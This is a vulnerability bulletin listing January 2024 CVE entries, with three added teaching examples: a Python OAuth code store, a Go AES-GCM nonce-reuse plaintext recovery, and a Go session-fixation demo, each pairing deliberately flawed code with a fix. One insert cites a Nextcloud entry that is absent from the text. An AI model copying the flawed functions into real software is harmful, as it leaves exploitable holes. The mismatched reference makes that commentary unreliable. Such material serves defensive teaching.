oracle -- jd_edwards_enterpriseone_tools | Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Package Build SEC). Supported versions that are affected are prior to 9.2.8.1. Easily exploitable vulnerability allows a high-privileged attacker with network access via JDENET to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of JD Edwards EnterpriseOne Tools. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L). | 2024-01-16 | 2.7 | CVE-2024-20957 | secalert_us@oracle.com
oracle -- solaris | Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystem). The supported version that is affected is 11. Easily exploitable vulnerability allows a low-privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Solaris accessible data. CVSS 3.1 Base Score 3.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N). | 2024-01-16 | 3.8 | CVE-2024-20920 | secalert_us@oracle.com
oracle -- zfs_storage_appliance_kit | Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Core). The supported version that is affected is 8.8. Easily exploitable vulnerability allows a high-privileged attacker with logon to the infrastructure where Oracle ZFS Storage Appliance Kit executes to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle ZFS Storage Appliance Kit accessible data. CVSS 3.1 Base Score 2.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N). | 2024-01-16 | 2.3 | CVE-2024-20914 | secalert_us@oracle.com
oracle_corporation -- audit_vault_and_database_firewall | Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Difficult-to-exploit vulnerability allows a high-privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. While the vulnerability is in Oracle Audit Vault and Database Firewall, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 3.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:N). | 2024-01-16 | 3.0 | CVE-2024-20910 | secalert_us@oracle.com
oracle_corporation -- audit_vault_and_database_firewall | Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Easily exploitable vulnerability allows a high-privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N). | 2024-01-16 | 2.7 | CVE-2024-20912 | secalert_us@oracle.com
oracle_corporation -- graalvm_enterprise_edition | Vulnerability in the Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Compiler). Supported versions that are affected are Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Difficult-to-exploit vulnerability allows an unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). | 2024-01-16 | 3.7 | CVE-2024-20955 | secalert_us@oracle.com
oracle_corporation -- java_se_jdk_and_jre | Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult-to-exploit vulnerability allows an unauthenticated attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N). | 2024-01-16 | 2.5 | CVE-2024-20922 | secalert_us@oracle.com
social_networking_site -- social_networking_site | A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross-site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability. | 2024-01-19 | 3.5 | CVE-2024-0722 | cna@vuldb.com
ursa -- ursa | Ursa is a cryptographic library for use with blockchains. A weakness in the Hyperledger AnonCreds specification that is not mitigated in the Ursa and AnonCreds implementations is that the Issuer does not publish a key correctness proof demonstrating that a generated private key is sufficient to meet the unlinkability guarantees of AnonCreds. The Ursa and AnonCreds CL-Signatures implementations always generate a sufficient private key. A malicious issuer could in theory create a custom CL Signature implementation (derived from the Ursa or AnonCreds CL-Signatures implementations) that uses weakened private keys such that presentations from holders could be shared by verifiers with the issuer, who could determine the holder to which the credential was issued. This vulnerability could impact holders of AnonCreds credentials implemented using the CL-signature scheme in the Ursa and AnonCreds implementations of CL Signatures. The Ursa project has moved to end-of-life status and no fix is expected. | 2024-01-16 | 3.3 | CVE-2022-31021 | security-advisories@github.com
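The Nextcloud Server entry above (CVE-2024-22403) describes OAuth authorization codes that never expired, fixed by invalidating them after 10 minutes. The store below is an added example and is not Nextcloud's code; it shows the unexpiring redeem path beside a hardened one that also binds the code to the issuing client and makes it single-use, both of which RFC 6749 section 4.1.2 requires alongside its recommended 10-minute maximum lifetime (the bulletin entry mentions only the lifetime). Client and user identifiers and the injectable fake clock are constructed for the demonstration.

```python
import hashlib
import secrets
import time
from dataclasses import dataclass

CODE_TTL_SECONDS = 600  # the 10-minute lifetime the Nextcloud entry describes


@dataclass
class _CodeRecord:
    client_id: str
    user_id: str
    issued_at: float
    redeemed: bool = False


class AuthCodeStore:
    """Server-side authorization-code store (example code, not Nextcloud's).

    Codes are keyed by their SHA-256 hash so a leaked table does not yield
    usable codes; `clock` is injectable so expiry can be tested without sleeping.
    """

    def __init__(self, ttl: float = CODE_TTL_SECONDS, clock=time.time):
        self._ttl = ttl
        self._clock = clock
        self._records: dict[str, _CodeRecord] = {}

    @staticmethod
    def _key(code: str) -> str:
        return hashlib.sha256(code.encode()).hexdigest()

    def issue(self, client_id: str, user_id: str) -> str:
        code = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._records[self._key(code)] = _CodeRecord(client_id, user_id, self._clock())
        return code

    def redeem_unexpiring(self, code: str, client_id: str):
        # The flawed behaviour: a code is honoured whenever it is presented,
        # so an intercepted code stays valid indefinitely.
        rec = self._records.get(self._key(code))
        if rec is None or rec.client_id != client_id:
            return None
        return rec.user_id

    def redeem(self, code: str, client_id: str):
        # Hardened: bounded lifetime, bound to the client it was issued to,
        # and single-use. Presenting an already-redeemed code is treated as a
        # compromise signal and the record is dropped outright.
        key = self._key(code)
        rec = self._records.get(key)
        if rec is None or rec.client_id != client_id:
            return None
        if rec.redeemed:
            del self._records[key]
            return None
        if self._clock() - rec.issued_at > self._ttl:
            del self._records[key]
            return None
        rec.redeemed = True
        return rec.user_id


def demo() -> dict:
    """Drive both redeem paths with a fake clock: issue at t=0, present later."""
    now = [0.0]
    store = AuthCodeStore(clock=lambda: now[0])
    code = store.issue("client-a", "user-42")
    out = {}
    now[0] = 30.0
    out["fresh_wrong_client"] = store.redeem(code, "client-b")
    out["fresh"] = store.redeem(code, "client-a")
    out["replay"] = store.redeem(code, "client-a")
    stale = store.issue("client-a", "user-42")
    now[0] = 30.0 + CODE_TTL_SECONDS + 1
    out["stale_unexpiring"] = store.redeem_unexpiring(stale, "client-a")
    out["stale_fixed"] = store.redeem(stale, "client-a")
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

In a real deployment the replay branch should also revoke any access and refresh tokens previously issued from that code, which is what RFC 6749 asks for when a code is used twice; the example drops only the code record because it holds no tokens.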


Severity Not Yet Assigned

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
wordpress -- wordpressThe WP-Invoice WordPress plugin through 4.3.1 does not have CSRF check in place when updating its settings, and is lacking sanitization as well as escaping in some of them, allowing attacker to make a logged in admin change them and add XSS payload in them2024-01-16not yet calculatedCVE-2022-1617
contact@wpscan.com
202_ecommerce -- advanced_loyalty_program: loyalty_ points_before_v2.3.4An issue in 202 ecommerce Advanced Loyalty Program: Loyalty Points before v2.3.4 for PrestaShop allows unauthenticated attackers to arbitrarily change an order status.2024-01-16not yet calculatedCVE-2023-48926
cve@mitre.org
abo.cms -- abo.cmsA cross-site scripting (XSS) vulnerability in the login page PHP code in Armex ABO.CMS 5.9 allows remote attackers to inject arbitrary web script or HTML via the login.php? URL part.2024-01-17not yet calculatedCVE-2023-48858
cve@mitre.org
abo.cms -- abo.cmsCross Site Scripting vulnerability in ABO.CMS v.5.9.3 allows an attacker to execute arbitrary code via a crafted payload to the Referer header.2024-01-17not yet calculatedCVE-2023-46952
cve@mitre.org
actidata -- actinas_sl_2u-8_rdx_3.2.03-sp1Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML.2024-01-19not yet calculatedCVE-2023-51946
cve@mitre.org
actidata -- actinas_sl_2u-8_rdx_3.2.03-sp1Improper access control on nasSvr.php in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to read and modify different types of data without authentication.2024-01-19not yet calculatedCVE-2023-51947
cve@mitre.org
actidata -- actinas_sl_2u-8_rdx_3.2.03-sp1A site-wide directory listing vulnerability in /fm in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to list the files hosted by the web application.2024-01-19not yet calculatedCVE-2023-51948
cve@mitre.org
alinto -- sogoAlinto SOGo before 5.9.1 is vulnerable to HTML Injection.2024-01-16not yet calculatedCVE-2023-48104
cve@mitre.org
amazon_web_services -- encryption_sdkAWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures.2024-01-19not yet calculatedCVE-2024-23680
disclosure@vulncheck.com
anomali -- matchAnomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3.2024-01-19not yet calculatedCVE-2023-49329
cve@mitre.org
apache -- iotdbRemote Code Execution vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 1.0.0 through 1.2.2. Users are recommended to upgrade to version 1.3.0, which fixes the issue.2024-01-15not yet calculatedCVE-2023-46226
security@apache.org
apache -- tomcatGeneration of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, and from 9.0.0-M11 through 9.0.43. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.2024-01-19not yet calculatedCVE-2024-21733
security@apache.org
apache -- shiroApache Shiro before 1.13.0 or 2.0.0-alpha-4 may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting. Mitigation: update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).2024-01-15not yet calculatedCVE-2023-46749
security@apache.org
apache -- solrExposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr. The Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users are able to specify which environment variables to hide; however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, as Java system properties can be, and may be set for the entire host, unlike Java system properties, which are set per Java process. The Solr Metrics API is protected by the "metrics-read" permission. Therefore, Solr Clouds with Authorization set up will only be vulnerable via users with the "metrics-read" permission. This issue affects Apache Solr: from 9.0.0 before 9.3.0. Users are recommended to upgrade to version 9.3.0 or later, in which environment variables are not published via the Metrics API.2024-01-15not yet calculatedCVE-2023-50290
security@apache.org
artemis_java_test_sandbox -- artemis_java_test_sandboxArtemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.2024-01-19not yet calculatedCVE-2024-23681
disclosure@vulncheck.com
artemis_java_test_sandbox -- artemis_java_test_sandboxArtemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.2024-01-19not yet calculatedCVE-2024-23682
disclosure@vulncheck.com
artemis_java_test_sandbox -- artemis_java_test_sandboxArtemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.2024-01-19not yet calculatedCVE-2024-23683
disclosure@vulncheck.com
atlassian -- confluence_data_centerThis High severity RCE (Remote Code Execution) vulnerability was introduced in version 7.19.0 of Confluence Data Center. This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.2, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction. Atlassian recommends that Confluence Data Center customers upgrade to the latest version; if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: Confluence Data Center and Server 7.19: upgrade to release 7.19.17 or any higher 7.19.x release; Confluence Data Center and Server 8.5: upgrade to release 8.5.5 or any higher 8.5.x release; Confluence Data Center and Server 8.7: upgrade to release 8.7.2 or any higher release. See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html). You can download the latest version of Confluence Data Center from the download center (https://www.atlassian.com/software/confluence/download-archives). This vulnerability was discovered by m1sn0w and reported via our Bug Bounty program.2024-01-16not yet calculatedCVE-2023-22526
security@atlassian.com
atlassian -- confluence_data_centerA template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian's January Security Bulletin.2024-01-16not yet calculatedCVE-2023-22527
security@atlassian.com
atlassian -- confluence_data_center/confluence_serverThis High severity Remote Code Execution (RCE) vulnerability was introduced in version 2.1.0 of Confluence Data Center and Server. This Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.3 and a CVSS Vector of CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H, allows an unauthenticated attacker to remotely expose assets in your environment susceptible to exploitation, which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to the latest version; if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: upgrade to release 7.19.18 or any higher 7.19.x release * Confluence Data Center and Server 8.5: upgrade to release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: upgrade to release 8.7.2 or any higher release. See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives).2024-01-16not yet calculatedCVE-2024-21672
security@atlassian.com
atlassian -- confluence_data_center/confluence_serverThis High severity Remote Code Execution (RCE) vulnerability was introduced in version 7.13.0 of Confluence Data Center and Server. This Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.0 and a CVSS Vector of CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H, allows an authenticated attacker to expose assets in your environment susceptible to exploitation, which has high impact to confidentiality, high impact to integrity, high impact to availability, and does not require user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to the latest version; if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: upgrade to release 7.19.18 or any higher 7.19.x release * Confluence Data Center and Server 8.5: upgrade to release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: upgrade to release 8.7.2 or any higher release. See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives).2024-01-16not yet calculatedCVE-2024-21673
security@atlassian.com
atlassian -- confluence_data_center/confluence_serverThis High severity Remote Code Execution (RCE) vulnerability was introduced in version 7.13.0 of Confluence Data Center and Server. This Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.6 and a CVSS Vector of CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N, allows an unauthenticated attacker to expose assets in your environment susceptible to exploitation, which has high impact to confidentiality, no impact to integrity, no impact to availability, and does not require user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to the latest version; if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: upgrade to release 7.19.18 or any higher 7.19.x release * Confluence Data Center and Server 8.5: upgrade to release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: upgrade to release 8.7.2 or any higher release. See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives).2024-01-16not yet calculatedCVE-2024-21674
security@atlassian.com
atos -- unify_openscape_voice_v10A directory traversal vulnerability in the SOAP Server integrated in Atos Unify OpenScape Voice V10 before V10R3.26.1 allows a remote attacker to view the contents of arbitrary files in the local file system. An unauthenticated attacker might obtain sensitive files that allow for the compromise of the underlying system.2024-01-12not yet calculatedCVE-2023-48166
cve@mitre.org
autotest_driver -- autotest_driverIn the autotest driver, there is a possible out-of-bounds write due to improper input validation. This could lead to local denial of service with System execution privileges needed.2024-01-18not yet calculatedCVE-2023-48359
security@unisoc.com
beetl-bbs -- beetl-bbsA Stored Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the post/save content parameter.2024-01-16not yet calculatedCVE-2024-22491
cve@mitre.org
clickhouse -- clickhouse-javaExposure of sensitive information in exceptions in ClickHouse's clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when 'sslkey' is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message.2024-01-19not yet calculatedCVE-2024-23689
disclosure@vulncheck.com
cohesity -- dataprotectCohesity DataProtect 6.8.1 and 6.6.0d was discovered to have an incorrect access control vulnerability due to a lack of TLS certificate validation.2024-01-19not yet calculatedCVE-2023-33295
cve@mitre.org
concise_binary_object_representation -- concise_binary_object_representationInefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application's use of this library, this may be a remote attacker.2024-01-19not yet calculatedCVE-2024-23684
disclosure@vulncheck.com
consensys -- discoveryConsensys Discovery versions less than 0.4.5 use the same AES/GCM nonce for the entire session, whereas the nonce should be unique for every message. The node's private key is not compromised; only the session key generated for specific peer communication is exposed.2024-01-19not yet calculatedCVE-2024-23688
disclosure@vulncheck.com
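Why a fixed per-session AES-GCM nonce matters, as an added example that is not Consensys Discovery's code: GCM encrypts in counter mode, so two messages sealed under the same key and nonce share a keystream, and an eavesdropper who knows one plaintext recovers the other by XORing the ciphertexts. The key, the two messages and the counter-based nonce scheme in the corrected sender are all constructed for this demo and are assumptions, not details of the Discovery implementation.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"fmt"
)

// demoKey is a constructed AES-128 key for this demo only; never hard-code real keys.
var demoKey = []byte("0123456789abcdef")

// sealGCM encrypts plaintext with AES-GCM under key and a 12-byte nonce and
// returns ciphertext || 16-byte tag, as Go's GCM implementation produces it.
func sealGCM(key, nonce, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return aead.Seal(nil, nonce, plaintext, nil), nil
}

// xorBytes XORs a and b over their common length.
func xorBytes(a, b []byte) []byte {
	n := len(a)
	if len(b) < n {
		n = len(b)
	}
	out := make([]byte, n)
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// recoverFromReuse is the eavesdropper's computation. Under one key and one
// nonce, C1 XOR C2 == P1 XOR P2, so knowing P1 reveals P2 over the overlap
// without the key. The authentication tags are stripped first; they do not help.
func recoverFromReuse(c1, c2, knownP1 []byte) []byte {
	const tagLen = 16
	return xorBytes(xorBytes(c1[:len(c1)-tagLen], c2[:len(c2)-tagLen]), knownP1)
}

// NonceReuseLeak seals p1 and p2 under one fixed nonce (the flawed
// "one nonce per session" pattern) and returns what an eavesdropper who
// knows p1 recovers of p2.
func NonceReuseLeak(p1, p2 []byte) ([]byte, error) {
	fixedNonce := make([]byte, 12) // all zero, reused for every message
	c1, err := sealGCM(demoKey, fixedNonce, p1)
	if err != nil {
		return nil, err
	}
	c2, err := sealGCM(demoKey, fixedNonce, p2)
	if err != nil {
		return nil, err
	}
	return recoverFromReuse(c1, c2, p1), nil
}

// sessionSender is the corrected pattern: a per-session key paired with a
// monotonically increasing counter as the nonce, so no two messages under
// the same key ever share a nonce (re-key long before the counter wraps).
type sessionSender struct {
	key     []byte
	counter uint64
}

func (s *sessionSender) nextNonce() []byte {
	nonce := make([]byte, 12)
	binary.BigEndian.PutUint64(nonce[4:], s.counter)
	s.counter++
	return nonce
}

func (s *sessionSender) Seal(plaintext []byte) ([]byte, error) {
	return sealGCM(s.key, s.nextNonce(), plaintext)
}

// UniqueNonceLeak repeats the attack against the corrected sender; the
// result is keystream noise rather than p2.
func UniqueNonceLeak(p1, p2 []byte) ([]byte, error) {
	s := &sessionSender{key: demoKey}
	c1, err := s.Seal(p1)
	if err != nil {
		return nil, err
	}
	c2, err := s.Seal(p2)
	if err != nil {
		return nil, err
	}
	return recoverFromReuse(c1, c2, p1), nil
}

func main() {
	// Constructed sample messages, loosely shaped like discovery traffic.
	p1 := []byte("FINDNODE distance=256 ")
	p2 := []byte("PING  enr-seq=42 peer1")
	leaked, _ := NonceReuseLeak(p1, p2)
	fmt.Printf("reused nonce:  recovered %q match=%v\n", leaked, bytes.Equal(leaked, p2))
	guess, _ := UniqueNonceLeak(p1, p2)
	fmt.Printf("unique nonces: recovered %q match=%v\n", guess, bytes.Equal(guess, p2))
}
```

The same XOR relation also lets an attacker forge tags once enough reused-nonce traffic is observed, which is why the fix is a fresh nonce per message rather than a longer key; a random 96-bit nonce is the alternative to the counter shown here, with re-keying well before the birthday bound.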
d-link -- go-rt-ac750_v101b03In D-LINK Go-RT-AC750 v101b03, the sprintf function in the sub_40E700 function within the cgibin is susceptible to stack overflow.2024-01-16not yet calculatedCVE-2024-22916
cve@mitre.org
dependencycheck_for_maven -- dependencycheck_for_mavenDependencyCheck for Maven 9.0.0 to 9.0.6, for CLI versions 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file.2024-01-19not yet calculatedCVE-2024-23686
disclosure@vulncheck.com
dom96 -- httpbeast_v.0.4.1An issue in dom96 HTTPbeast v.0.4.1 and before allows a remote attacker to execute arbitrary code via a crafted request to the parser.nim component.2024-01-19not yet calculatedCVE-2023-50694
cve@mitre.org
dom96 -- jester_v.0.6.0An issue in dom96 Jester v.0.6.0 and before allows a remote attacker to execute arbitrary code via a crafted request.2024-01-19not yet calculatedCVE-2023-50693
cve@mitre.org
drm_driver -- drm_driverIn the drm driver, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.2024-01-18not yet calculatedCVE-2023-48358
security@unisoc.com
drupal -- coreDrupal contains a vulnerability with improper handling of structural elements. If this vulnerability is exploited, an attacker may be able to cause a denial-of-service (DoS) condition.2024-01-16not yet calculatedCVE-2024-22362
vultures@jpcert.or.jp
e-cology -- e-cologyAn issue in weaver e-cology v.10.0.2310.01 allows a remote attacker to execute arbitrary code via a crafted script to the FrameworkShellController component.2024-01-20not yet calculatedCVE-2023-51892
cve@mitre.org
ebyte -- e880-ir01-v1.1An issue discovered in EBYTE E880-IR01-V1.1 allows an attacker to obtain sensitive information via crafted POST request to /cgi-bin/luci.2024-01-18not yet calculatedCVE-2023-50614
cve@mitre.org
edimax -- br6478ac_v2_firmwareA stack-based buffer overflow vulnerability in the /bin/webs binary in Edimax BR6478AC V2 firmware version v1.23 allows attackers to overwrite other values located on the stack due to an incorrect use of the strcpy() function.2024-01-16not yet calculatedCVE-2023-49351
cve@mitre.org
ejinshan -- v8+_terminal_security_systemFile upload vulnerability in ejinshan v8+ terminal security system allows attackers to upload arbitrary files to arbitrary locations on the server.2024-01-20not yet calculatedCVE-2021-31314
cve@mitre.org
emlog -- pro_v2.1.14Emlog Pro v2.1.14 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/article.php?action=write.2024-01-16not yet calculatedCVE-2023-41619
cve@mitre.org
enonic_xp -- enonic_xpEnonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. A remote and unauthenticated attacker can use prior sessions due to the lack of invalidation of session attributes.2024-01-19not yet calculatedCVE-2024-23679
disclosure@vulncheck.com
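The session-fixation failure mode in general terms, as an added example that is not Enonic XP's code and makes no claim about how that product manages sessions: the vulnerable login records authentication on whatever session ID the client presented, so an ID an attacker obtained and planted in the victim's browser beforehand becomes the victim's authenticated session; the fix invalidates the pre-authentication session and issues a fresh ID on successful login. The in-memory store, the demo user table and the single-goroutine design are assumptions made for this demo.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
)

// session is the server-side record behind one session ID.
type session struct {
	user string // empty until the client authenticates
}

// Store is an in-memory session table keyed by session ID (the cookie value).
// Single-goroutine demo; a real store needs locking and expiry.
type Store struct {
	sessions map[string]*session
}

// NewStore returns an empty session store.
func NewStore() *Store {
	return &Store{sessions: make(map[string]*session)}
}

// newSessionID returns 128 bits of CSPRNG output, hex-encoded.
func newSessionID() string {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		panic(err) // a broken CSPRNG is not recoverable here
	}
	return hex.EncodeToString(b)
}

// Begin creates an anonymous (pre-authentication) session and returns its ID.
func (s *Store) Begin() string {
	id := newSessionID()
	s.sessions[id] = &session{}
	return id
}

// UserFor returns the authenticated user bound to sid, or "" if none.
func (s *Store) UserFor(sid string) string {
	if sess, ok := s.sessions[sid]; ok {
		return sess.user
	}
	return ""
}

// demoUsers is a constructed credential table for the demo only.
var demoUsers = map[string]string{"alice": "correct horse battery staple"}

func checkPassword(user, password string) bool {
	return demoUsers[user] == password
}

// LoginFixable is the vulnerable pattern: a successful login is recorded on
// the session ID the client presented, so an ID the attacker planted in the
// victim's browser beforehand is now an authenticated session the attacker knows.
func (s *Store) LoginFixable(sid, user, password string) (string, error) {
	if !checkPassword(user, password) {
		return "", errors.New("bad credentials")
	}
	sess, ok := s.sessions[sid]
	if !ok {
		return "", errors.New("unknown session")
	}
	sess.user = user
	return sid, nil
}

// LoginSafe is the fix: on success the pre-authentication session is
// invalidated and a fresh ID is issued, so an ID known to a third party
// before login never becomes authenticated.
func (s *Store) LoginSafe(sid, user, password string) (string, error) {
	if !checkPassword(user, password) {
		return "", errors.New("bad credentials")
	}
	delete(s.sessions, sid) // the planted ID is dead from here on
	fresh := newSessionID()
	s.sessions[fresh] = &session{user: user}
	return fresh, nil
}

// FixationAttack plays the attack against a login function: the attacker
// obtains a valid anonymous session ID, gets it into the victim's browser
// (e.g. via a URL parameter or an injected cookie), and the victim logs in
// with it. It reports whether the attacker's ID now acts as the victim.
func FixationAttack(s *Store, login func(sid, user, password string) (string, error)) bool {
	attackerSID := s.Begin()
	if _, err := login(attackerSID, "alice", "correct horse battery staple"); err != nil {
		return false
	}
	return s.UserFor(attackerSID) == "alice"
}

func main() {
	s := NewStore()
	fmt.Println("LoginFixable, attacker session authenticated:", FixationAttack(s, s.LoginFixable))
	fmt.Println("LoginSafe, attacker session authenticated:   ", FixationAttack(s, s.LoginSafe))
}
```

Regenerating the ID on every privilege change (login, role elevation, password change) is the check to look for when reviewing a session layer; the pre-login ID must be dropped server-side, not merely overwritten in the client's cookie.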
examsys -- examsysExamSys 9150244 allows SQL Injection via the /Support/action/Pages.php s_score2 parameter.2024-01-17not yet calculatedCVE-2023-52285
cve@mitre.org
